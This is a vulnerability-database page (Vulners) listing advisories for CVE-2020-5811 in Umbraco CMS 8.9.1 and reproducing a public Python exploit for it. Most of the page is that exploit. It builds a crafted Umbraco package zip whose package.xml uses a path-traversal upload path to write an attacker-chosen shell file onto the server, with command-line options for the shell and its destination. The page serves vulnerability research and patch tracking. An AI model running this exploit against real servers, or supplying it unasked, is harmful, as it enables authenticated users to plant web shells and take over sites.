Vulners
Lucene search
Umbraco CMS 8.9.1 - Directory Traversal
| Reporter | Title | Published | Views | Family All 13 |
|---|---|---|---|---|
 | Umbraco CMS 8.9.1 - Path traversal and Arbitrary File Write (Authenticated) Exploit | 31 Aug 202100:00 | – | zdt |
 | CVE-2020-5811 | 21 Sep 202104:41 | – | circl |
 | Umbraco 路径遍历漏洞 | 30 Dec 202000:00 | – | cnnvd |
 | Umbraco Path Traversal Vulnerability | 31 Dec 202000:00 | – | cnvd |
 | CVE-2020-5811 | 30 Dec 202015:17 | – | cve |
 | CVE-2020-5811 | 30 Dec 202015:17 | – | cvelist |
 | EUVD-2021-0802 | 7 Oct 202500:30 | – | euvd |
 | Authenticated path traversal in Umbraco CMS | 13 Apr 202115:51 | – | github |
 | CVE-2020-5811 | 30 Dec 202016:15 | – | nvd |
 | GHSA-936X-WGQV-HHGQ Authenticated path traversal in Umbraco CMS | 13 Apr 202115:51 | – | osv |
10
# Exploit Title: Umbraco CMS 8.9.1 - Path traversal and Arbitrary File Write (Authenticated)
# Exploit Author: BitTheByte
# Description: Authenticated path traversal vulnerability.
# Exploit Research: https://www.tenable.com/security/research/tra-2020-59
# Vendor Homepage: https://umbraco.com/
# Version: <= 8.9.1
# CVE : CVE-2020-5811
import string
import random
import argparse
import zipfile
import os
package_xml = f"""<?xml version="1.0" encoding="utf-8"?>
<umbPackage>
<files>
<file>
<guid>{{filename}}</guid>
<orgPath>{{upload_path}}</orgPath>
<orgName>{{filename}}</orgName>
</file>
</files>
<info>
<package>
<name>PoC-{''.join(random.choice(string.ascii_uppercase + string.digits) for _ in range(8))}</name>
<version>1.0.0</version>
<iconUrl></iconUrl>
<license url="http://opensource.org/licenses/MIT">MIT License</license>
<url>https://example.com</url>
<requirements>
<major>0</major>
<minor>0</minor>
<patch>0</patch>
</requirements>
</package>
<author>
<name>CVE-2020-5811</name>
<website>https://example.com</website>
</author>
<contributors>
<contributor></contributor>
</contributors>
<readme><![CDATA[]]></readme>
</info>
<DocumentTypes />
<Templates />
<Stylesheets />
<Macros />
<DictionaryItems />
<Languages />
<DataTypes />
<Actions />
</umbPackage>
"""
parser = argparse.ArgumentParser(description='CVE-2020-5811')
parser.add_argument('--shell', type=str, help='Shell file to upload', required=True)
parser.add_argument('--upload-path', type=str, help='Shell file update path on target server (default=~/../scripts)', default='~/../scripts')
args = parser.parse_args()
if not os.path.isfile(args.shell):
print("[ERROR] please use a correct path for the shell file.")
output_file = "exploit.zip"
package = zipfile.ZipFile(output_file, 'w')
package.writestr('package.xml', package_xml.format(filename=os.path.basename(args.shell), upload_path=args.upload_path))
package.writestr(os.path.basename(args.shell), open(args.shell, 'r').read())
package.close()
print(f"[DONE] Created Umbraco package: {output_file}")Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
31 Aug 2021 00:00Current
6.5Medium risk
Vulners AI Score6.5
CVSS 24
CVSS 3.16.5
EPSS0.02606